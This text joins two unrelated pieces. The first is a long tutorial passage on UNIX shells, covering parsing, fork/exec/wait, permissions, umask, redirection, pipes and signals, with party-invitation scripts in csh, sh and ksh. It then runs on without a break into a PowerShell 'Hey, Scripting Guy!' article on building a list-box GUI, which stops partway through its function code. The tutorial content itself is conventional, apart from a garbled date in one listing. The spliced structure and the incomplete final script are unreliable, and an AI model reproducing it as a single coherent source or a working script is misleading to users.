One of the major functions of a shell is to interpret commands entered at the command line prompt when running interactively. The shell parses the command line, breaking it into words (called tokens), separated by whitespace, which consists of tabs, spaces, or a newline. If the words contain special metacharacters, the shell evaluates them. The shell handles file I/O and background processing. After the command line has been processed, the shell searches for the command and starts its execution.

Another important function of the shell is to customize the user's environment, normally done in shell initialization files. These files contain definitions for setting terminal keys and window characteristics; setting variables that define the search path, permissions, prompts, and the terminal type; and setting variables that are required for specific applications such as windows, text-processing programs, and libraries for programming languages. The Korn shell and C shell also provide further customization with the addition of history and aliases, built-in variables set to protect the user from clobbering files or inadvertently logging out, and to notify the user when a job has completed.
The shell can also be used as an interpreted programming language. Shell programs, also called scripts, consist of commands listed in a file. The programs are created in an editor (although on-line scripting is permitted). They consist of UNIX commands interspersed with fundamental programming constructs such as variable assignment, conditional tests, and loops. You do not have to compile shell scripts. The shell interprets each line of the script as if it had been entered from the keyboard.

Because the shell is responsible for interpreting commands, it is necessary for the user to have an understanding of what those commands are. See Appendix A for a list of useful commands. The shell is ultimately responsible for making sure that any commands typed at the prompt get properly executed. Included in those responsibilities are:

- Reading input and parsing the command line.
- Evaluating special characters.
- Setting up pipes, redirection, and background processing.
- Handling signals.
- Setting up programs for execution.

Each of these topics is discussed in detail as it pertains to a particular shell.

When you start up your system, the first process is called init. Each process has a process identification number associated with it, called the PID. Since init is the first process, its PID is 1. The init process initializes the system and then starts another process to open terminal lines and set up the standard input (stdin), standard output (stdout), and standard error (stderr), which are all associated with the terminal. The standard input normally comes from the keyboard; the standard output and standard error go to the screen. At this point, a login prompt would appear on your terminal. After you type your login name, you will be prompted for a password. The /bin/login program then verifies your identity by checking the first field in the passwd file.
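A passwd record is a single colon-separated line with seven fields; the first is the login name that /bin/login checks, and the last is the shell it will start. A minimal bash sketch of pulling one apart (the "ellie" entry is invented for illustration, not a real account):

```shell
#!/bin/bash
# Hypothetical passwd entry in the real seven-field layout:
# name:passwd:uid:gid:gecos:home:shell
entry="ellie:x:500:500:Ellie Main:/home/ellie:/bin/bash"

# Split on colons into the seven fields.
IFS=: read -r user passwd uid gid gecos home shell <<< "$entry"

echo "login name:  $user"    # the field /bin/login checks first
echo "login shell: $shell"   # the field that decides which shell starts
```

Run with bash, this prints "login name:  ellie" and "login shell: /bin/bash".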
If your username is there, the next step is to run the password you typed through an encryption program to determine if it is indeed the correct password. Once your password is verified, the login program sets up an initial environment consisting of variables that define the working environment that will be passed on to the shell. The HOME, SHELL, USER, and LOGNAME variables are assigned values extracted from information in the passwd file. The HOME variable is assigned your home directory; the SHELL variable is assigned the name of the login shell, which is the last entry in the passwd file. The USER and/or LOGNAME variables are assigned your login name. A search path variable is set so that commonly used utilities may be found in specified directories.

When login has finished, it will execute the program found in the last entry of the passwd file. Normally, this program is a shell. If the last entry in the passwd file is /bin/csh, the C shell program is executed. If the last entry in the passwd file is /bin/sh or is null, the Bourne shell starts up. If the last entry is /bin/ksh, the Korn shell is executed. This shell is called the login shell.

After the shell starts up, it checks for any systemwide initialization files set up by the system administrator and then checks your home directory to see if there are any shell-specific initialization files there. If any of these files exist, they are executed. The initialization files are used to further customize the user environment. After the commands in those files have been executed, a prompt appears on the screen. The shell is now waiting for your input.

When you type a command at the prompt, the shell reads a line of input and parses the command line, breaking the line into words, called tokens. Tokens are separated by spaces and tabs and the command line is terminated by a newline.[1] The shell then checks to see whether the first word is a built-in command or an executable program located somewhere out on disk.
If it is built-in, the shell will execute the command internally. Otherwise, the shell will search the directories listed in the path variable to find out where the program resides. If the command is found, the shell will fork a new process and then execute the program. The shell will sleep (or wait) until the program finishes execution and then, if necessary, will report the status of the exiting program. A prompt will appear and the whole process will start again. The order of processing the command line is as follows:

1. History substitution is performed (if applicable).
2. Command line is broken up into tokens, or words.
3. History is updated (if applicable).
4. Quotes are processed.
5. Alias substitution and functions are defined (if applicable).
6. Redirection, background, and pipes are set up.
7. Variable substitution ($user, $name, etc.) is performed.
8. Command substitution (echo "today is `date`") is performed.
9. Filename substitution, called globbing (cat abc.??, rm *.c, etc.) is performed.
10. Program execution.

When a command is executed, it is an alias, a function, a built-in command, or an executable program on disk. Aliases are abbreviations (nicknames) for existing commands and apply to the C, TC, Bash, and Korn shells. Functions apply to the Bourne (introduced with AT&T System V, Release 2.0), Bash, and Korn shells. They are groups of commands organized as separate routines. Aliases and functions are defined within the shell's memory. Built-in commands are internal routines in the shell, and executable programs reside on disk. The shell uses the path variable to locate the executable programs on disk and forks a child process before the command can be executed. This takes time. When the shell is ready to execute the command, it evaluates command types in the following order:[2]

1. Aliases
2. Keywords
3. Functions (bash)
4. Built-in commands
5. Executable programs

If, for example, the command is xyz, the shell will check to see if xyz is an alias.
If not, is it a built-in command or a function? If neither of those, it must be an executable command residing on the disk. The shell then must search the path for the command.

A process is a program in execution and can be identified by its unique PID (process identification) number. The kernel controls and manages processes. A process consists of the executable program, its data and stack, program and stack pointer, registers, and all the information needed for the program to run. When you start the shell, it is a process. The shell belongs to a process group identified by the group's PID. Only one process group has control of the terminal at a time and is said to be running in the foreground. When you log on, your shell is in control of the terminal and waits for you to type a command at the prompt.

The shell can spawn other processes. In fact, when you enter a command at the prompt or from a shell script, the shell has the responsibility of finding the command either in its internal code (built-in) or out on the disk and then arranging for the command to be executed. This is done with calls to the kernel, called system calls. A system call is a request for kernel services and is the only way a process can access the system's hardware. There are a number of system calls that allow processes to be created, executed, and terminated. (The shell provides other services from the kernel when it performs redirection and piping, command substitution, and the execution of user commands.) The system calls used by the shell to cause new processes to run are discussed in the following sections. See Figure 1.2.

The ps Command. The ps command with its many options displays a list of the processes currently running in a number of formats. Example 1.1 shows all processes being run by users on a Linux system. (See Appendix A for ps and its options.)
$ ps au     (BSD/Linux ps)   (use ps -ef for SVR4)
USER     PID %CPU %MEM  SIZE  RSS TTY STAT START TIME COMMAND
ellie    456  0.0  1.3  1268  840   1 S    13:23 0:00 -bash
ellie    476  0.0  1.0  1200  648   1 S    13:23 0:00 sh /usr/X11R6/bin/sta
ellie    478  0.0  1.0  2028  676   1 S    13:23 0:00 xinit /home/ellie/.xi
ellie    480  0.0  1.6  1852 1068   1 S    13:23 0:00 fvwm2
ellie    483  0.0  1.3  1660  856   1 S    13:23 0:00 /usr/X11R6/lib/X11/fv
ellie    484  0.0  1.3  1696  868   1 S    13:23 0:00 /usr/X11R6/lib/X11/fv
ellie    487  0.0  2.0  2348 1304   1 S    13:23 0:00 xclock -bg #c0c0c0 -p
ellie    488  0.0  1.1  1620  724   1 S    13:23 0:00 /usr/X11R6/lib/X11/fv
ellie    489  0.0  2.0  2364 1344   1 S    13:23 0:00 xload -nolabel -bg gr
ellie    495  0.0  1.3  1272  848  p0 S    13:24 0:00 -bash
ellie    797  0.0  0.7   852  484  p0 R    14:03 0:00 ps au
root     457  0.0  0.4   724  296   2 S    13:23 0:00 /sbin/mingetty tty2
root     458  0.0  0.4   724  296   3 S    13:23 0:00 /sbin/mingetty tty3
root     459  0.0  0.4   724  296   4 S    13:23 0:00 /sbin/mingetty tty4
root     460  0.0  0.4   724  296   5 S    13:23 0:00 /sbin/mingetty tty5
root     461  0.0  0.4   724  296   6 S    13:23 0:00 /sbin/mingetty tty6
root     479  0.0  4.5 12092 2896   1 S    13:23 0:01 X :0
root     494  0.0  2.5  2768 1632   1 S    13:24 0:00 nxterm -ls -sb -fn

The fork System Call. A process is created in UNIX with the fork system call. The fork system call creates a duplicate of the calling process. The new process is called the child and the process that created it is called the parent. The child process starts running right after the call to fork, and both processes initially share the CPU. The child process has a copy of the parent's environment, open files, real and effective user identifications, umask, current working directory, and signals.

When you type a command, the shell parses the command line and determines whether the first word is a built-in command or an executable command that resides out on the disk. If the command is built-in, the shell handles it, but if on the disk, the shell invokes the fork system call to make a copy of itself (Figure 1.3).
Its child will search the path to find the command, as well as set up the file descriptors for redirection, pipes, command substitution, and background processing. While the child shell works, the parent normally sleeps. (See wait, below.)

The wait System Call. The parent shell is programmed to go to sleep (wait) while the child takes care of details such as handling redirection, pipes, and background processing. The wait system call causes the parent process to suspend until one of its children terminates. If wait is successful, it returns the PID of the child that died and the child's exit status. If the parent does not wait and the child exits, the child is put in a zombie state (suspended animation) and will stay in that state until either the parent calls wait or the parent dies.[3] If the parent dies before the child, the init process adopts any orphaned zombie process. The wait system call, then, is not just used to put a parent to sleep, but also to ensure that the process terminates properly.

The exec System Call. After you enter a command at the terminal, the shell normally forks off a new shell process: the child process. As mentioned earlier, the child shell is responsible for causing the command you typed to be executed. It does this by calling the exec system call. Remember, the user command is really just an executable program. The shell searches the path for the new program. If it is found, the shell calls the exec system call with the name of the command as its argument. The kernel loads this new program into memory in place of the shell that called it. The child shell, then, is overlaid with the new program. The new program becomes the child process and starts executing. Although the new process has its own local variables, all environment variables, open files, signals, and the current working directory are passed to the new process. This process exits when it has finished, and the parent shell wakes up.

The exit System Call.
A new program can terminate at any time by executing the exit call. When a child process terminates, it sends a signal (sigchild) and waits for the parent to accept its exit status. The exit status is a number between 0 and 255. An exit status of zero indicates that the program executed successfully, and a nonzero exit status means that the program failed in some way.

For example, if the command ls had been typed at the command line, the parent shell would fork a child process and go to sleep. The child shell would then exec (overlay) the ls program in its place. The ls program would run in place of the child, inheriting all the environment variables, open files, user information, and state information. When the new process finished execution, it would exit and the parent shell would wake up. A prompt would appear on the screen, and the shell would wait for another command. If you are interested in knowing how a command exited, each shell has a special built-in variable that contains the exit status of the last command that terminated. (All of this will be explained in detail in the individual shell chapters.) See Figure 1.4 for an example of process creation and termination.

(C Shell)

1   % cp filex filey
    % echo $status
    0
2   % cp xyz
    Usage: cp [-ip] f1 f2; or: cp [-ipr] f1 ... fn d2
    % echo $status
    1

(Bourne and Korn Shells)

3   $ cp filex filey
    $ echo $?
    0
    $ cp xyz
    Usage: cp [-ip] f1 f2; or: cp [-ipr] f1 ... fn d2
    $ echo $?
    1

When you log on, the shell starts up and inherits a number of variables, I/O streams, and process characteristics from the /bin/login program that started it. In turn, if another shell is spawned (forked) from the login or parent shell, that child shell (subshell) will inherit certain characteristics from its parent. A subshell may be started for a number of reasons: for handling background processing, for handling groups of commands, or for executing scripts. The child shell inherits an environment from its parent.
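The whole cycle just described — fork, wait, exit status, and inheritance by the child — can be watched from a POSIX sh prompt. In this sketch the variable names FOO and BAR are arbitrary:

```shell
# fork: a background command runs in a forked child; $! records its PID
false &
echo "parent PID: $$   child PID: $!"

# wait: the parent suspends until the child dies, then collects its status
wait $!
echo "exit status of false: $?"     # prints 1

# inheritance: exported variables reach the child; plain locals do not
FOO=local
export BAR=shared
sh -c 'echo "child sees FOO=[$FOO] BAR=[$BAR]"'   # FOO is empty, BAR=shared
```

The builtins `wait` and `exec` expose the underlying system calls of the same names; `( exec echo hi )` overlays only the throwaway subshell, which is why nothing after the exec in that subshell ever runs.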
The environment consists of process permissions (who owns the process), the working directory, the file creation mask, special variables, open files, and signals.

When you log on, the shell is given an identity. It has a real user identification (UID), one or more real group identifications (GID), and an effective user identification and effective group identification (EUID and EGID). The EUID and EGID are initially the same as the real UID and GID. These ID numbers are found in the passwd file and are used by the system to identify users and groups. The EUID and EGID determine what permissions a process has access to when reading, writing, or executing files. If the EUID of a process and the real UID of the owner of the file are the same, the process has the owner's access permissions for the file. If the EGID and real GID of a process are the same, the process has the owner's group privileges.

The real UID, from the /etc/passwd file, is a positive integer associated with your login name. The real UID is the third field in the password file. When you log on, the login shell is assigned the real UID, and all processes spawned from the login shell inherit its permissions. Any process running with a UID of zero belongs to root (the superuser) and has root privileges. The real group identification, the GID, associates a group with your login name. It is found in the fourth field of the password file.

The EUID and EGID can be changed to numbers assigned to a different owner. By changing the EUID (or EGID[4]) to another owner, you can become the owner of a process that belongs to someone else. Programs that change the EUID or EGID to another owner are called setuid or setgid programs. The /bin/passwd program is an example of a setuid program that gives the user root privileges. Setuid programs are often sources for security holes. The shell allows you to create setuid scripts, and the shell itself may be a setuid program.
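These identities are easy to inspect with the id utility, and a setuid program shows up in a long listing with an s in the owner's execute position. A sketch (the printed values vary by user and system, and the path to passwd differs across UNIX variants):

```shell
id          # real/effective UID and GID plus the group list
id -u       # just the real UID
id -un      # the login name that maps to that UID

# On many Linux systems the passwd program is setuid root:
ls -l /usr/bin/passwd    # typically -rwsr-xr-x ... root
```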
When a file is created, it is given a set of default permissions. These permissions are determined by the program creating the file. Child processes inherit a default mask from their parents. The user can change the mask for the shell by issuing the umask command at the prompt or by setting it in the shell's initialization files. The umask command is used to remove permissions from the existing mask. Initially, the umask is 000, giving a directory 777 (rwxrwxrwx) permissions and a file 666 (rw-rw-rw-) permissions as the default. On most systems, the umask is assigned a value of 022 by the /bin/login program or the /etc/profile initialization file. The umask value is subtracted from the default settings for both the directory and file permissions as follows:

     777 (Directory)        666 (File)
    -022 (umask value)     -022 (umask value)
    ----                   ----
     755                    644

Result:  drwxr-xr-x         -rw-r--r--

After the umask is set, all directories and files created by this process are assigned the new default permissions. In this example, directories will be given read, write, and execute for the owner; read and execute for the group; and read and execute for the rest of the world (others). Any files created will be assigned read and write for the owner, and read for the group and others. To change permissions on individual directories and files, the chmod command is used.

There is one owner for every UNIX file. Only the owner or the superuser can change the permissions on a file or directory by issuing the chmod command. The following example illustrates the permissions modes. A group may have a number of members, and the owner of the file may change the group permissions on a file so that the group can enjoy special privileges. The chown command changes the owner and group on files and directories. Only the owner or superuser can invoke it. On BSD versions of UNIX, only the superuser, root, can change ownership.
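The subtraction above, and a follow-up chmod, can be verified in a scratch directory. This sketch sets the umask inside a subshell so the login shell's mask is left untouched (mktemp is assumed to be available):

```shell
dir=$(mktemp -d)        # throwaway scratch directory
(
  cd "$dir"
  umask 022
  mkdir d               # directory comes out 755: drwxr-xr-x
  touch f               # file comes out 644:      -rw-r--r--
  ls -ld d f
  chmod g+w f           # symbolic chmod: add write for the group
  ls -l f               # now 664: -rw-rw-r--
)
rm -rf "$dir"
```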
Every UNIX file has a set of permissions associated with it to control who can read, write, or execute the file. A total of nine bits constitutes the permissions on a file. The first set of three bits controls the permissions of the owner of the file, the second set controls the permissions of the group, and the last set controls the permissions of everyone else. The permissions are stored in the mode field of the file's inode. The chmod command changes permissions on files and directories. The user must own the files to change permissions on them.[5] Table 1.1 illustrates the eight possible combinations of numbers used for changing permissions. The symbolic notation for chmod is as follows: r = read; w = write; x = execute; u = user; g = group; o = others; a = all.

1   $ chmod 755 file
    $ ls -l file
    -rwxr-xr-x  1 ellie  0 Mar 7 12:52 file
2   $ chmod g+w file
    $ ls -l file
    -rwxrwxr-x  1 ellie  0 Mar 7 12:54 file
3   $ chmod go-rx file
    $ ls -l file
    -rwx-w----  1 ellie  0 Mar 7 12:56 file
4   $ chmod a=r file
    $ ls -l file
    -r--r--r--  1 ellie  0 Mar 7 12:59 file

(The Command Line)

1   $ chown steve filex
2   $ ls -l

(The Output)

-rwxrwxr-x  1 steve  groupa 170 Jul 28:20 filex

The Working Directory. When you log in, you are given a working directory within the file system, called the home directory. The working directory is inherited by processes spawned from this shell. Any child process of this shell can change its own working directory, but the change will have no effect on the parent shell. The cd command, used to change the working directory, is a shell built-in command. Each shell has its own copy of cd. A built-in command is executed directly by the shell as part of the shell's code; the shell does not perform the fork and exec system calls when executing built-in commands. If another shell (script) is forked from the parent shell, and the cd command is issued in the child shell, the directory will be changed in the child shell.
When the child exits, the parent shell will be in the same directory it was in before the child started.

1   % cd /
2   % pwd
    /
3   % sh
4   $ cd /home
5   $ pwd
    /home
6   $ exit
7   % pwd
    /
    %

Variables. The shell can define two types of variables: local and environment. The variables contain information used for customizing the shell, and information required by other processes so that they will function properly. Local variables are private to the shell in which they are created and are not passed on to any processes spawned from that shell. Environment variables, on the other hand, are passed from parent to child process, from child to grandchild, and so on. Some of the environment variables are inherited by the login shell from the /bin/login program. Others are created in the user initialization files, in scripts, or at the command line. If an environment variable is set in the child shell, it is not passed back to the parent.

File Descriptors. The first three file descriptors, 0, 1, and 2, are assigned to your terminal. File descriptor 0 is standard input (stdin), 1 is standard output (stdout), and 2 is standard error (stderr). When you open a file, the next available descriptor is 3, and it will be assigned to the new file. If all the available file descriptors are in use,[6] a new file cannot be opened.

Redirection. When a file descriptor is assigned to something other than a terminal, it is called I/O redirection. The shell performs redirection of output to a file by closing the standard output file descriptor, 1 (the terminal), and then assigning that descriptor to the file (Figure 1.5). When redirecting standard input, the shell closes file descriptor 0 (the terminal) and assigns that descriptor to a file (Figure 1.6). The Bourne and Korn shells handle errors by assigning a file to file descriptor 2 (Figure 1.7).
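That descriptors 1 and 2 are independent streams is easy to demonstrate with Bourne-family syntax: send each stream to its own file and inspect the results.

```shell
# stdout (fd 1) goes to "out"; stderr (fd 2) goes to "err"
ls . /nonexistent > out 2> err || true
cat out     # the listing of the current directory
cat err     # the complaint about /nonexistent (wording varies by system)
rm -f out err
```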
The C shell, on the other hand, goes through a more complicated process to do the same thing (Figure 1.8).

1   % who > file
2   % cat file1 file2 >> file3
3   % mail tom < file
4   % find / -name file -print 2> errors
5   % ( find / -name file -print > /dev/tty ) >& errors

Pipes. Pipes allow the output of one command to be sent to the input of another command. The shell implements pipes by closing and opening file descriptors; however, instead of assigning the descriptors to a file, it assigns them to a pipe descriptor created with the pipe system call. After the parent creates the pipe file descriptors, it forks a child process for each command in the pipeline. By having each process manipulate the pipe descriptors, one will write to the pipe and the other will read from it. The pipe is merely a kernel buffer through which both processes can share data, thus eliminating the need for intermediate temporary files. After the descriptors are set up, the commands are exec'ed concurrently. The output of one command is sent to the buffer, and when the buffer is full or the command has terminated, the command on the right-hand side of the pipe reads from the buffer. The kernel synchronizes the activities so that one process waits while the other reads from or writes to the buffer.

The syntax of the pipe command is:

who | wc

The shell sends the output of the who command as input to the wc command. This is accomplished with the pipe system call. The parent shell calls the pipe system call, which creates two pipe descriptors, one for reading from the pipe and one for writing to it. The files associated with the pipe descriptors are kernel-managed I/O buffers used to temporarily store data, thus saving you the trouble of creating temporary files. Figures 1.9 through 1.13 illustrate the steps for implementing the pipe.

The parent shell calls the pipe system call. Two file descriptors are returned: one for reading from the pipe and one for writing to the pipe.
The file descriptors assigned are the next available descriptors in the file-descriptor (fd) table, fd 3 and fd 4. See Figure 1.9.

For each command, who and wc, the parent forks a child process. Both child processes get a copy of the parent's open file descriptors. See Figure 1.10.

The first child closes its standard output. It then duplicates (the dup system call) file descriptor 4, the one associated with writing to the pipe. The dup system call copies fd 4 and assigns the copy to the lowest available descriptor in the table, fd 1. After the copy is made, the child closes fd 4. The child will now close fd 3 because it does not need it. This child wants its standard output to go to the pipe. See Figure 1.11.

Child 2 closes its standard input. It then duplicates (dups) fd 3, which is associated with reading from the pipe. By using dup, a copy of fd 3 is created and assigned to the lowest available descriptor. Since fd 0 was closed, it is the lowest available descriptor. After the copy is made, the child closes fd 3. The child also closes fd 4. Its standard input will come from the pipe. See Figure 1.12.

The who command is executed in place of Child 1 and the wc command is executed to replace Child 2. The output of the who command goes into the pipe and is read by the wc command from the other end of the pipe. See Figure 1.13.

A signal sends a message to a process and normally causes the process to terminate, usually owing to some unexpected event such as a segmentation violation, bus error, or power failure. You can send signals to a process by pressing the Break, Delete, Quit, or Stop keys, and all processes sharing the terminal are affected by the signal sent. You can kill a process with the kill command. By default, most signals terminate the program. The shells allow you to handle signals coming into your program, either by ignoring them or by specifying some action to be taken when a specified signal arrives. The C shell is limited to handling ^C (Control-C).
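In the Bourne-family shells, signal handling is done with the trap builtin (the C shell's only comparable facility is onintr, for interrupts). A sketch in which a throwaway shell catches the TERM signal it sends to itself:

```shell
sh -c '
  trap "echo caught SIGTERM; exit 0" TERM   # install a handler for SIGTERM
  kill -TERM $$                             # send the signal to ourselves
  echo "never reached"                      # the handler exits first
'
```

Running this prints "caught SIGTERM"; without the trap, the shell would simply be terminated by the signal.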
When the shell is used as a programming language, commands and shell control constructs are typed in an editor and saved to a file, called a script. The lines from the file are read and executed one at a time by the shell. These programs are interpreted, not compiled. Compiled programs are converted into machine language before they are executed. Therefore, shell programs are usually slower than binary executables, but they are easier to write and are used mainly for automating simple tasks. Shell programs can also be written interactively at the command line, and for very simple tasks, this is the quickest way. However, for more complex scripting, it is easier to write scripts in an editor (unless you are a really great typist). The following script can be executed by any shell to output the same results. Figure 1.14 illustrates the creation of a script called doit and how it fits in with already existing UNIX programs/utilities/commands.

At first glance, the following three programs look very similar. They are. And they all do the same thing. The main difference is the syntax. After you have worked with all three shells for some time, you will quickly adapt to the differences and start formulating your own opinions about which shell is your favorite. A detailed comparison of differences among the C, Bourne, and Korn shells is found in Appendix B.

The following scripts send a mail message to a list of users, inviting each of them to a party. The place and time of the party are set in variables. The people to be invited are selected from a file called guests. A list of foods is stored in a word list, and each person is asked to bring one of the foods from the list. If there are more users than food items, the list is reset so that each user is asked to bring a different food. The only user who is not invited is the user root.

(C Shell)

1   #!/bin/csh -f
2   # The Party Program -- Invitations to friends from the "guest" file
3   set guestfile = ~/shell/guests
4   if ( ! -e "$guestfile" ) then
        echo "$guestfile:t non-existent"
        exit 1
    endif
5   setenv PLACE "Sarotini's"
    @ Time = `date +%H` + 1
    set food = ( cheese crackers shrimp drinks "hot dogs" sandwiches )
6   foreach person ( `cat $guestfile` )
        if ( $person =~ root ) continue
7       mail -v -s "Party" $person << FINIS    # Start of here document
    Hi ${person}! Please join me at $PLACE for a party!
    Meet me at $Time o'clock. I'll bring the ice cream.
    Would you please bring $food[1] and anything else you would like to eat?
    Let me know if you can't make it. Hope to see you soon.
        Your pal,
        ellie@`hostname`    # or `uname -n`
FINIS
8       shift food
        if ( $#food == 0 ) then
            set food = ( cheese crackers shrimp drinks "hot dogs" sandwiches )
        endif
9   end
    echo "Bye..."

(Bourne Shell)

1   #!/bin/sh
2   # The Party Program -- Invitations to friends from the "guest" file
3   guestfile=/home/jody/ellie/shell/guests
4   if [ ! -f "$guestfile" ]
    then
        echo "`basename $guestfile` non-existent"
        exit 1
    fi
5   PLACE="Sarotini's"
    export PLACE
    Time=`date +%H`
    Time=`expr $Time + 1`
    set cheese crackers shrimp drinks "hot dogs" sandwiches
6   for person in `cat $guestfile`
    do
        if [ $person = root ]
        then
            continue
        else
7           mail -v -s "Party" $person << FINIS    # Start of here document
    Hi $person! Please join me at $PLACE for a party!
    Meet me at $Time o'clock. I'll bring the ice cream.
    Would you please bring $1 and anything else you would like to eat?
    Let me know if you can't make it. Hope to see you soon.
        Your pal,
        ellie@`uname -n`
FINIS
8           shift
            if [ $# -eq 0 ]
            then
                set cheese crackers shrimp drinks "hot dogs" sandwiches
            fi
        fi
9   done
    echo "Bye..."

(Korn Shell)

1   #!/bin/ksh
2   # The Party Program -- Invitations to friends from the "guest" file
3   guestfile=~/shell/guests
4   if [[ ! -a "$guestfile" ]]
    then
        print "${guestfile##*/} non-existent"
        exit 1
    fi
5   export PLACE="Sarotini's"
    (( Time=$(date +%H) + 1 ))
    set cheese crackers shrimp drinks "hot dogs" sandwiches
6   for person in $(< $guestfile)
    do
        if [[ $person = root ]]
        then
            continue
        else
7           mail -v -s "Party" $person << FINIS    # Start of here document
    Hi $person! Please join me at $PLACE for a party!
    Meet me at $Time o'clock. I'll bring the ice cream.
    Would you please bring $1 and anything else you would like to eat?
    Let me know if you can't make it. Hope to see you soon.
        Your pal,
        ellie@$(uname -n)
FINIS
8           shift
            if (( $# == 0 ))
            then
                set cheese crackers shrimp drinks "hot dogs" sandwiches
            fi
        fi
9   done
    print "Bye..."

[1] The process of breaking the line up into tokens is called lexical analysis.

[2] Numbers 3 and 4 are reversed for Bourne and Korn(88) shells. Number 3 does not apply for C and TC shells.

[3] A zombie cannot be removed with the kill command; it disappears once its parent calls wait or, if the parent dies first, once init adopts and reaps it. Zombies whose parent neither waits nor exits persist until the system is rebooted.
[4] The setgid permission is system-dependent in its use. On some systems, a setgid on a directory may cause files created in that directory to belong to the same group that is owned by the directory. On others, the EGID of the process determines the group that can use the file. [5] The caller's EUID must match the owner's UID of the file, or the owner must be superuser. [6] See built-in commands, limit and ulimit.
Hey, Scripting Guy! I know this may sound like a strange question, but I would like to create a graphical user interface for a Windows PowerShell script. I could do these kinds of things using an HTML Application (HTA) file, but I like writing Windows PowerShell scripts. If I could use some sort of functionality that would create a drop-down list that would allow a user to select a specific item from the list, it would be great. Or do I need to continue creating HTAs if I want a graphical user interface? I guess I could figure out a way to run Windows PowerShell code from inside my HTA. Let me know.

— MC

Hello MC,

Microsoft Scripting Guy Ed Wilson here. A graphical user interface (GUI) is not something I have been a big fan of in the IT pro/scripting world. I have always figured that if I needed a GUI, I would use Visual Studio and write either a VB.NET or a C# application. Visual Studio makes it so easy to do this; it hardly seems worth the effort to write HTML code by hand. With the advent of the free versions of VB.NET and Visual C#, there is no need for cost justification for the IT pro who wants to start using developer tools. The step from VBScript to VB.NET or from Windows PowerShell to C# is not a very big one. The big commitment, of course, is the time investment it takes to learn the new tools.

From having worked with thousands of IT pros in the last few years, I do know that there are some legitimate reasons for creating GUIs, and the HTA has been a faithful servant in that arena. Unfortunately, I have always found them to be an overly complex technology and a horribly documented one at that. If it were not for the few Hey, Scripting Guy! articles and the HTA Helpomatic (available from our home page), there would be almost no help for HTAs. Here is an example of an HTA that creates a drop-down list and populates it with items from a text file. A similar HTA is discussed in the Hey, Scripting Guy! article, How Can I Load a Drop-Down List from a Text File?
DisplayListBox.hta

<head>
<!--
'********************************************************************
'*
'* File: DisplayListBox.hta
'* Author: Ed Wilson
'* Created: 8/21/2009
'* Version: 1.0
'*
'* Description: Reads a text file, and creates a list box
'*
'* Dependencies: You must modify path to the text file
'* HSG-08-31-09
'********************************************************************
-->
<title>HTA List Box</title>
<HTA:APPLICATION
  ID="ListBox"
  APPLICATIONNAME="HTAListBox"
  SCROLL="yes"
  SINGLEINSTANCE="yes"
>
</head>

<SCRIPT LANGUAGE="VBScript">
Sub Window_Onload
  LoadListBox
End Sub

Sub LoadListBox
  ForReading = 1
  strNewFile = "c:\FSO\ItemList.txt"
  Set objFSO = CreateObject("Scripting.FileSystemObject")
  Set objFile = objFSO.OpenTextFile _
    (strNewFile, ForReading)
  strItems = objFile.ReadAll
  objFile.Close
  arrItems = Split(strItems,vbNewLine)
  For Each strItem in arrItems
    Set objOption = Document.createElement("OPTION")
    objOption.Text = strItem
    objOption.Value = strItem
    Items.Add(objOption)
  Next
End Sub
</SCRIPT>

<body>
<select name="Items">
</select>
</body>

When the DisplayListBox.hta script is run, this GUI is displayed:

The ItemList.txt file is not anything special. It is a list of item names as seen here:

I created the ItemList.txt text file in Explorer, and was getting ready to add some content to the list. Then I realized, this is dumb, I am the Scripting Guy … I know how to write scripts. Therefore, I created the contents of the item list text file by typing the command seen here at a Windows PowerShell prompt.

PS C:\> 1..20 | ForEach-Object { Add-Content C:\fso\ItemList.txt "Item$_" }

The Get-ListBoxFunction.ps1 script contains most of the code in a function called Get-ListBox. I could have called the function New-ListBox and thought about it pretty hard. However, when I looked at Windows PowerShell cmdlets that used the new verb, it did not seem to match up too well, so in the end I decided to call it Get-ListBox.
Function names should conform to the Verb-Noun pattern in Windows PowerShell 2.0, or they will generate warning messages when placed into modules. It is a good idea to get in the habit of thinking about proper function names now.

The first thing you must do is load the assembly that contains the various graphical classes we want to use. To do this you use the LoadWithPartialName static method from the System.Reflection.Assembly class. In Windows PowerShell 2.0, this is easier because you can use the Add-Type cmdlet to do this for you. Because you do not want to be distracted with the confirmation message from calling the method, you pipe the results to the Out-Null cmdlet. This is seen here:

[System.Reflection.Assembly]::LoadWithPartialName("System.windows.forms") | out-null

You next need to create an instance of a Windows form. The Form class resides in the System.Windows.Forms namespace and is documented on MSDN. Because System is the root namespace and is prepended automatically to the classes, you can leave it off when you create the class. You then assign a title for the Windows form of "ListBox Control" by assigning a value for the text property. This is seen here:

$WinForm = new-object Windows.Forms.Form
$WinForm.text = "ListBox Control"

The size of the form is specified as an instance of a Drawing.Size structure. You need to create an instance of the Drawing.Size structure, and specify the height and the width of the form. The Drawing.Size structure is documented on MSDN. One way to get the Drawing.Size dimensions is to draw the form in Visual Studio and look at the code behind the picture. You can also run the code and experiment with the sizes until you obtain a size that works for your particular application:

$WinForm.Size = new-object Drawing.Size(200,125)

Once you have a form and a size for the form, you need to create a list box. The list box is an instance of the ListBox class that is found in the Windows.Forms namespace.
It is documented on MSDN and has a number of methods and properties:

$ListBox = new-object Windows.Forms.ListBox

You now need to add the controls to the Form. To do this, you use the controls.add method. Each item is added by using the items collection from the list box, and calling the add method. The Get-Content cmdlet is used to read the contents of the text file. Because you do not want to see the feedback from adding the item to the list box, we pipeline the results to the Out-Null cmdlet. This is seen here:

$winform.controls.add($listbox)
ForEach($i in (Get-Content c:\fso\itemlist.txt))
 { $ListBox.items.add($i) | Out-Null }

The last thing you need to do is to activate the Form and show the dialog. This is seen here:

$WinForm.Add_Shown($WinForm.Activate())
$WinForm.showdialog() | out-null

When you select an item from the list box, it is assigned to the SelectedItem property of the ListBox class. The function returns this to the calling code. This is seen here:

$ListBox.SelectedItem
} #end function Get-ListBox

The entry point to the script calls the Get-ListBox function. It does not pass any values to it; however, one improvement would be to modify the function to accept the path to the items it will use to populate the list box. This is seen here:

# *** Entry Point to Script ***

Get-ListBox

The complete Get-ListBoxFunction.ps1 script is seen here.
Get-ListBoxFunction.ps1

# ------------------------------------------------------------------------
# Get-ListBoxFunction.ps1
# ed wilson, msft, 8/20/2009
#
# Keywords: .NET Framework, Reflection, windows.Forms,
# graphical,gui
#
# HSG-08-31-09
# MSDN documentation for Listbox :
# ------------------------------------------------------------------------
Function Get-ListBox
{
 [System.Reflection.Assembly]::LoadWithPartialName("System.windows.forms") | out-null
 $WinForm = new-object Windows.Forms.Form
 $WinForm.text = "ListBox Control"
 $WinForm.Size = new-object Drawing.Size(200,125)
 $ListBox = new-object Windows.Forms.ListBox
 $winform.controls.add($listbox)
